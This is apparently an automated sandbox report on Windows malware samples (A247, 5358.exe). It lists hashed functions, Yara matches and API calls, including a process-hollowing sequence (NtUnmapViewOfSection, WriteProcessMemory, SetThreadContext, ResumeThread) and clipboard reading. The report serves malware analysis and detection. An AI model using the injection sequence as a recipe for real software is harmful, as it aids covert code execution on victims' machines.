Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
Instruction ID: bc7c6b262941583c1c881f0145b11d4a8e543b7fb80ac5050190f686a5bebd1f
Opcode Fuzzy Hash: 0d71a57cd882e273a6c56ce9b72a8ed7186c85e47ae9bb2a3c29e23a8caddaad
Instruction Fuzzy Hash: 8911F5746093808BE324DF14C864B9FFBF1BF82304F044A1CE5858B291D77A9855CF86

Function 0040FBB4 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
Instruction ID: e698e1f68e38f1bc9b47cf2ac497e118824270fadebddc114e7481b80e060ba0
Opcode Fuzzy Hash: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
Instruction Fuzzy Hash: 90115B741883C28BE3348F04D864BEFB7E1BB86345F48183DD899962C2D37988558F4A

Function 0061FE1B Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
Instruction ID: 6192d5ed6faf4e24b7ba6500b975f8db6c677087d0552143b1db7236a6b27167
Opcode Fuzzy Hash: 52f227c8592f5c2cc3229bd8a018e3a24b41eaee9032ee69e0cbf16b167d9f9e
Instruction Fuzzy Hash: BF1169701883C28BD3348F14D8A4BEFB7E1BB86345F48193CD89987282C3B988518F46

Function 00438F15 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
Instruction ID: fea6b9262a02cc5a27262c34f28cf05daf4f77e687b26c47e49c1a77e78bbb2c
Opcode Fuzzy Hash: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
Instruction Fuzzy Hash: 03E04FBB9112608BCBA88F24D991576F7B1EB47F50B59601EE446F7350DA34EC00CB0A

Function 0064917C Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
Instruction ID: 7e3330f624fd9a1f26bbf5dce8da9e2777bf1bfdd94c27b83f807919fd8d21a0
Opcode Fuzzy Hash: fb520afb4c7028e21bc1d123390b4ebc175e9035a42cbe707a82af3ce4ea84c5
Instruction Fuzzy Hash: BEE04FBE9512A08BCB68CF24D891572B7B1FB43F50B59501DE446E7350D630EC00CB16

Function 006312E0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 262a0625e730f3a272db31694606eccad8b6e132ec4b2629bc2c27a0c5ad0a2d
Instruction ID: 4e0e7b284f0bba5e80b2b1c70b908c79f8e2214b7357b599e956068f61674614
Opcode Fuzzy Hash: 262a0625e730f3a272db31694606eccad8b6e132ec4b2629bc2c27a0c5ad0a2d
Instruction Fuzzy Hash: C0E0C25460898387E3098E2994703B7F7EA5F03306F2891B9D8D38FA41E625E9804384

Function 0040CB10 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 15f5a020169ecd94f448affbf7eac2585d4a5225e6d21b45986e377c0b9b8dd8
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 52D0A7715487A14ED7588E3824E157BFBF8E947612B1825AFE4D1F3245D234EC01879D

Function 0061CD77 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: e48867bf7553f10b65bf2fff5e8af8d69ced05271ab30c87efc08621540f0e50
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: F4D0A7619887A10E9B588E3814A08FBFFE5ED47722F1C24AEE4D1E3205D220DC41D798

Function 008B2CD7 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871870285.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_8ad000_A247.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84637ed40dc845524da0f22a5c459a29830c068504c1783cee47edcb1d8e9528
Instruction ID: 9c25957a02b0c50e1544ebe2d71411fe246a90e6a9f0a21d5aaf03be7ac13e80
Opcode Fuzzy Hash: 84637ed40dc845524da0f22a5c459a29830c068504c1783cee47edcb1d8e9528
Instruction Fuzzy Hash: 4BD0C962A492CA8ED3128B31818ABD1BFD5AF52200B1E55EAC0E44E456C1289085DF21

Function 0062D097 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc8df1d88a68718305d81cb7bbe64538c0baeb9b6a0cc46f2b02e3b4a1a8a6cf
Instruction ID: 699feb5ee3d94f7cfc0a453b2fe9a3727c550fe2d3f5ff42bb8cfa63ada4f839
Opcode Fuzzy Hash: cc8df1d88a68718305d81cb7bbe64538c0baeb9b6a0cc46f2b02e3b4a1a8a6cf
Instruction Fuzzy Hash: D6A00238A4550187D104DF00D690475B335738B501B50B154D615231568B60D401C55C

Function 0062CF1A Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f580e30a6611fca79c1431b30a1db64368cf35633a261591e3f40f90ed873e
Instruction ID: 3ef96da8efbfa169e98678a181f5cf30cbc18a4f7711341d604041cc041c4401
Opcode Fuzzy Hash: 03f580e30a6611fca79c1431b30a1db64368cf35633a261591e3f40f90ed873e
Instruction Fuzzy Hash: C5A0022DD8A042DD81301FBA55142B4E3B99BC7321F59B865511C330614971D401C56D

Function 0063EEF7 Relevance: 50.9, APIs: 4, Strings: 25, Instructions: 184COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 0063EFCE
SelectObject.GDI32 ref: 0063F026
SelectObject.GDI32 ref: 0063F0A5
DeleteObject.GDI32 ref: 0063F0E2

Strings

LID, xrefs: 0063F1D6
07D, xrefs: 0063F2CF
@ID, xrefs: 0063F1CB
07D, xrefs: 0063F23F
07D, xrefs: 0063F2E7
pID, xrefs: 0063F1F7
dID, xrefs: 0063F1EC
07D, xrefs: 0063F22E
4ID, xrefs: 0063F1C0
HD, xrefs: 0063F17E
, xrefs: 0063F071
(ID, xrefs: 0063F1B5
07D, xrefs: 0063F2B7
07D, xrefs: 0063F287
07D, xrefs: 0063EF09
|ID, xrefs: 0063F202
XID, xrefs: 0063F1E1
07D, xrefs: 0063F136
HD, xrefs: 0063F173
07D, xrefs: 0063F29F
07D, xrefs: 0063F257
07D, xrefs: 0063F32F
07D, xrefs: 0063F26F
07D, xrefs: 0063F317
07D, xrefs: 0063F2FF

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID: Object$DeleteSelect
String ID: $(ID$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$4ID$@ID$LID$XID$dID$pID$|ID$HD$HD
API String ID: 618127014-763545205
Opcode ID: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
Instruction ID: 60327d0f96a7b3deecf0ce21178eeb5ed9b1cd1e9f4d058b5d703ebe2579cb86
Opcode Fuzzy Hash: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
Instruction Fuzzy Hash: C8B18CB85093808FE364DF29D58579BBBE0ABC9304F00892EE9D987350D7749548DF8A

Function 0063ED17 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 127clipboardCOMMON

Download Yara Rule

APIs

GetWindowInfo.USER32 ref: 0063ED3F
OpenClipboard.USER32 ref: 0063ED51
GetClipboardData.USER32 ref: 0063ED6A
GlobalFix.KERNEL32 ref: 0063ED8F
GlobalUnWire.KERNEL32 ref: 0063EEC0
CloseClipboard.USER32 ref: 0063EECF

Strings

F, xrefs: 0063EE13
@, xrefs: 0063EE09
C, xrefs: 0063EE0E
A, xrefs: 0063EDFA

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataInfoOpenWindowWire
String ID: @$A$C$F
API String ID: 2111159801-319984173
Opcode ID: f102b88c657c0386999a50c9b84d9cf073ded92d13a1d40d33957346412eb39a
Instruction ID: 9039a23ab111e01f54a0351add3d8ae0d446d3f66a3794fed2870a65ab61c6f7
Opcode Fuzzy Hash: f102b88c657c0386999a50c9b84d9cf073ded92d13a1d40d33957346412eb39a
Instruction Fuzzy Hash: 3F51367090C381CFC3509B28948875EBFE2AB95324F540E2EF4D5862D2C376854A8BA3

Function 0062D207 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 200COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0062D307
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0062D334

Strings

K-K/, xrefs: 0062D352
\1B3, xrefs: 0062D3B5
U5U7, xrefs: 0062D342

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: K-K/$U5U7$\1B3
API String ID: 237503144-1235027928
Opcode ID: aa3d6e910086139519e9c9cd08a0e925ab7e68abe48d6d60585da4ebcdaefe44
Instruction ID: f9fac42114a672b4b60c3c2d78a311bfcca5effaf1e9e50b809705de3d97f036
Opcode Fuzzy Hash: aa3d6e910086139519e9c9cd08a0e925ab7e68abe48d6d60585da4ebcdaefe44
Instruction Fuzzy Hash: D76169716087518FE324CF14C8A0BABB7E5EF86318F054A1DE8D65B381E7749905CBA7

Function 0062D205 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 198COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0062D307
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0062D334

Strings

K-K/, xrefs: 0062D352
\1B3, xrefs: 0062D3B5
U5U7, xrefs: 0062D342

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: K-K/$U5U7$\1B3
API String ID: 237503144-1235027928
Opcode ID: 7e8e35e858b108638980d6d7e1e17baf955cfc2ddcbe4743595041ff48c6fafd
Instruction ID: e6310d35ae5120fd3aaf21eb562e3aaf10f0d252a363312de9ee0313804d3c9c
Opcode Fuzzy Hash: 7e8e35e858b108638980d6d7e1e17baf955cfc2ddcbe4743595041ff48c6fafd
Instruction Fuzzy Hash: 636168716083518FE324CF14C8A0BABB7E1EF86318F058A1DE8D65B381D7749905CBA7

Function 0062DB47 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0062DC71
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0062DCA1

Strings

qs, xrefs: 0062DB8D
eI.K, xrefs: 0062DB7F

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: eI.K$qs
API String ID: 237503144-3936219367
Opcode ID: dc374d62b46038b04298b2915cbc0a4bfca21c88bdf5701a0e3bab2608cdf6d9
Instruction ID: 95e8dd7979162daed339000222d5307e2c954e25128295d63888e433561cf68d
Opcode Fuzzy Hash: dc374d62b46038b04298b2915cbc0a4bfca21c88bdf5701a0e3bab2608cdf6d9
Instruction Fuzzy Hash: 2E5144B0100B049BD7248F26D894BA7BBB6FF45354F544A1CE8A68BB85D7B4E809CF94

Function 00619107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 0061917B

Strings

of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 00619145

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
API String ID: 621844428-2804141084
Opcode ID: 13dc76ea7de215e409e79daecf993f3e92855b2eb19abbbd6ec502212a96d9e6
Instruction ID: 1b3e8271f0432d68e258844aad709f16c968089ff6326ec29e24eb3afcf9b28b
Opcode Fuzzy Hash: 13dc76ea7de215e409e79daecf993f3e92855b2eb19abbbd6ec502212a96d9e6
Instruction Fuzzy Hash: D9F04F7080C343AAC7847B71816B1EE7BABAF21310F18492EE49681180DB7084C69A67

Function 004131AE Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 363COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 00413884
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 004138B5

Strings

V", xrefs: 004135AF

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: V"
API String ID: 237503144-2019076553
Opcode ID: 217286694c207371e1da7005cc4ae52adee3662fce77df40bc553ada78db6358
Instruction ID: b8f590afc6553ff7605340d13dff726c6823d6bb3a5fa6397772a6377b5bee3a
Opcode Fuzzy Hash: 217286694c207371e1da7005cc4ae52adee3662fce77df40bc553ada78db6358
Instruction Fuzzy Hash: F8E138B05483828BD735CF14C854BEFBBE1BFC5309F48492DE89987282D7B999448F96

Function 00623415 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 363COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,00000000,?), ref: 00623AEB
RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000000,00000000,?,?), ref: 00623B1C

Strings

V", xrefs: 00623816

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: V"
API String ID: 237503144-2019076553
Opcode ID: 95e61789491e88786c18cc1acbf7ba66db770f412e53d14d44e515f6fe15e3af
Instruction ID: 60e9595e2a103a93ea42e236b73a8c89ac3163ad6ff0ac538ff26fc67e9e7f63
Opcode Fuzzy Hash: 95e61789491e88786c18cc1acbf7ba66db770f412e53d14d44e515f6fe15e3af
Instruction Fuzzy Hash: ADE138705487928BD335CF14C854BEFBBE2BF85315F48492DE89987381D7BA59448F82

Function 0042B932 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 0042B93C

Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD

Strings

_, xrefs: 0042BABF
/, xrefs: 0042BAF7

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: AllocateHeapString
String ID: /$_
API String ID: 983180023-3328996620
Opcode ID: d44023c7fa751cd99fecb0c56439effa9c6e9bec1ea8780a3ad4dbaf278e243a
Instruction ID: 6447c4c98e9839bbfe30095b09fd38d16c8898c21f8e458fc47884f27b927c9d
Opcode Fuzzy Hash: d44023c7fa751cd99fecb0c56439effa9c6e9bec1ea8780a3ad4dbaf278e243a
Instruction Fuzzy Hash: EBA1D372B097918FC3398A28C8903DFBBD2ABD5320F584A2DD4E9873D1DB359841C786

Function 0063BB99 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 244COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 0063BBA3

Strings

_, xrefs: 0063BD26
/, xrefs: 0063BD5E

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID: String
String ID: /$_
API String ID: 2568140703-3328996620
Opcode ID: 67fdbd68d30403a612d78c29cb09f4595bf568f7c7babfc7a8b0866fd35ec808
Instruction ID: c0e751c5660d5b012fdab5b349326afbe9e018a64f760f647df5b5d437b3ae87
Opcode Fuzzy Hash: 67fdbd68d30403a612d78c29cb09f4595bf568f7c7babfc7a8b0866fd35ec808
Instruction Fuzzy Hash: A4A19372A097818FD7398A2CC8903DBBBD3ABD5314F194A6CD5E9873D1DB358841CB82

Function 0042AA0F Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 0042AA1D

Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD

Strings

/, xrefs: 0042ABCB
_, xrefs: 0042AB93

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: AllocateHeapString
String ID: /$_
API String ID: 983180023-3328996620
Opcode ID: 9aede850ce2b0562b1a47ca178639b777b8fa13a2b64741c4ce5cfbc508a3bf8
Instruction ID: c0f22b295fcd5dfa813694d41399a3aed2f8b54868401d176934dc4335e9d724
Opcode Fuzzy Hash: 9aede850ce2b0562b1a47ca178639b777b8fa13a2b64741c4ce5cfbc508a3bf8
Instruction Fuzzy Hash: B291A5327093918FC725CE28C8903DBBBE2ABD5314F594A6DD8E9873D1D6359841CB47

Function 0063AC76 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 0063AC84

Strings

_, xrefs: 0063ADFA
/, xrefs: 0063AE32

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID: String
String ID: /$_
API String ID: 2568140703-3328996620
Opcode ID: e081c47d38b82d7d45e90f16465fe229bee5c6a2502c73ee57cf6a8e50573acb
Instruction ID: 88e51638d1931cf2149fe01d3d96d24922d7b588ac6c79f6cf7cbc99d72df8e6
Opcode Fuzzy Hash: e081c47d38b82d7d45e90f16465fe229bee5c6a2502c73ee57cf6a8e50573acb
Instruction Fuzzy Hash: 309194726093818FC739CE28C8947DABBE3AFD5314F194A6DD4E9873D1D6359801DB82

Function 00422158 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 004222C9
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004222FE

Strings

hi, xrefs: 00422213

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: EnvironmentExpandStrings$AllocateHeap
String ID: hi
API String ID: 3432729115-3633523372
Opcode ID: 8b55fbbcc88d9df6fa81dab6b43a18f61d3329a4ef0902c7050ab2936a50fb1d
Instruction ID: 955b234eacedc5ad79a5fbc0d5aeb5eb286d5c951f72c93c1ad7127c08102aad
Opcode Fuzzy Hash: 8b55fbbcc88d9df6fa81dab6b43a18f61d3329a4ef0902c7050ab2936a50fb1d
Instruction Fuzzy Hash: 3F5187B06083919FE324CF14D8807ABBBE5FBC5704F90892DF9999B280CB749805CB97

Function 006323BF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 00632530
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00632565

Strings

hi, xrefs: 0063247A

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: hi
API String ID: 237503144-3633523372
Opcode ID: 29d7f95366c994b5a62b8ac23ea0115722bb9db87849136ec9dd399547f2272f
Instruction ID: 5805755c6790091f5c05ddcdcde77e5906a0a969254fcdb34e2044259f796710
Opcode Fuzzy Hash: 29d7f95366c994b5a62b8ac23ea0115722bb9db87849136ec9dd399547f2272f
Instruction Fuzzy Hash: DF4146B06083959FE324CF54C8947ABBBE6FFC2740F80492CE9995B291C7748905CB96

Analysis Process: 5358.exePID: 4296, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	50.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	20.5%
Total number of Nodes:	39
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 043BA4F0 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 317
threadmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 043BA561
GetTempFileNameA.KERNELBASE(?,kate,00000000,?), ref: 043BA714
CreateFileA.KERNELBASE(?,00000003,00000000,00000000,00000004,00000002,00000000), ref: 043BA742
WriteFile.KERNELBASE(00000000,?,000D7400,00000000,00000000), ref: 043BA76C
CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 043BA7B6
NtUnmapViewOfSection.NTDLL(00000000,00400000), ref: 043BA7D0
VirtualAllocEx.KERNELBASE(00000000,00400000,?,00003000,00000040), ref: 043BA7FB
WriteProcessMemory.KERNELBASE(00000000,00400000,00000000,?,00000000), ref: 043BA81F
WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 043BA881
Wow64GetThreadContext.KERNEL32(?,00010002), ref: 043BA8AF
Wow64SetThreadContext.KERNEL32(?,00010002), ref: 043BA8DA
ResumeThread.KERNELBASE(?), ref: 043BA8EC
ExitProcess.KERNEL32(00000000), ref: 043BA8F9

Strings

kate, xrefs: 043BA700, 043BA703

Memory Dump Source

Source File: 00000008.00000002.2674561163.00000000043B9000.00000040.00001000.00020000.00000000.sdmp, Offset: 043B9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_43b9000_5358.jbxd

Yara matches

Similarity

API ID: Process$FileMemoryThreadWrite$ContextCreateVirtualWow64$AllocAllocateExitNameResumeSectionTempUnmapView
String ID: kate
API String ID: 1984375786-4076676908
Opcode ID: a5fb23d055b49c4060df56bacf9ee3ef03c1422c21c807da1347bc76d1211067
Instruction ID: e1961d858153c434e76b004c76fb6aa6873d7aef755d47ab2b428043834547c9
Opcode Fuzzy Hash: a5fb23d055b49c4060df56bacf9ee3ef03c1422c21c807da1347bc76d1211067
Instruction Fuzzy Hash: 88E1CB75A00208AFDB54CF84D895FEEB7B5BF88304F108199E648AB391D771AE85CF94

Function 043B9850 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 043B9FB0: VirtualAlloc.KERNELBASE(00000000,043B990F,00003000,00000040), ref: 043BA034

NtCreateFile.NTDLL(00000000,00120089,00000018,?,00000000,00000080,00000001,00000001,00000040,00000000,00000000), ref: 043B9A1B
FindCloseChangeNotification.KERNELBASE(00000000), ref: 043B9ACC

Strings

@, xrefs: 043B999D

Memory Dump Source

Source File: 00000008.00000002.2674561163.00000000043B9000.00000040.00001000.00020000.00000000.sdmp, Offset: 043B9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_43b9000_5358.jbxd

Yara matches

Similarity

API ID: AllocChangeCloseCreateFileFindNotificationVirtual
String ID: @
API String ID: 482251274-2766056989
Opcode ID: 0e0dc5585c33f2c4c31cdc6bfcf1500614589984357103c7c5ed85e8348694b7
Instruction ID: f9c9130bf86c03e86d9a9bfc30b08d99671a648198ffd9a850250ae68a4f84c0
Opcode Fuzzy Hash: 0e0dc5585c33f2c4c31cdc6bfcf1500614589984357103c7c5ed85e8348694b7
Instruction Fuzzy Hash: 7C81FE71A00218EFDB24DF54DC95FDAB3B5AF48710F1481E9EA49AB290D7706A84CF94

